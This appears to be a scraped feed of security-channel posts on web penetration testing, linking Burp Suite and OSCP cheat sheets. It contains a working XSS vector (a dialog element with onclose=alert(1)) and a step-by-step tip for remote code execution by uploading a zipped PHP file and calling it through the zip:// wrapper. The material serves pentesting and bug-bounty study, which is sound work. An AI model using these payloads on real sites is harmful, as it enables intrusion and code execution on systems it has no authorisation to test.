We have another new vector for the XSS cheat sheet! This one requires user interaction and uses the method attribute with the dialog value.
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
sri-check | A Burp Suite extension for identifying missing Subresource Integrity attributes.
https://github.com/PortSwigger/sri-check
https://github.com/PortSwigger/sri-check
Forwarded from π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»
Burp Suite Cheat Sheet
https://www.sans.org/security-resources/posters/burp-suite-cheat-sheet/280/download
https://www.sans.org/security-resources/posters/burp-suite-cheat-sheet/280/download
SANS Institute
Burp Suite Cheat Sheet
This cheat sheet enables users of Burp Suite with quicker operations and more ease of use. Burp Suite is the de-facto penetration testing tool for assessing web applications. It enables penetration testers to rapidly test applications via signature featuresβ¦
Forwarded from π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»
Cas van Cooten
OSCP Cheat Sheet and Command Reference
Updated May 18th, 2020
Since my OSCP certification exam is coming up, I decided to do a writeup of the commands and techniques I have most frequently used in the PWK labs and in similar machines. I aimed for it to be a basic command reference, but in writingβ¦
Since my OSCP certification exam is coming up, I decided to do a writeup of the commands and techniques I have most frequently used in the PWK labs and in similar machines. I aimed for it to be a basic command reference, but in writingβ¦
Forwarded from π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»
GitHub
GitHub - Ignitetechnologies/BurpSuite-For-Pentester: This cheatsheet is built for the Bug Bounty Hunters and penetration testersβ¦
This cheatsheet is built for the Bug Bounty Hunters and penetration testers in order to help them hunt the vulnerabilities from P4 to P1 solely and completely with "BurpSuite". - ...
Bug Bounty Hunting Tip :-
If you can upload .zip file on target then:
1. Create a .php file (rce.php)
2. Compress it to a .zip file (file.zip)
3. Upload your .zip file on the vulnerable web application.
4. Trigger your RCE via:
( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )
If you can upload .zip file on target then:
1. Create a .php file (rce.php)
2. Compress it to a .zip file (file.zip)
3. Upload your .zip file on the vulnerable web application.
4. Trigger your RCE via:
( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )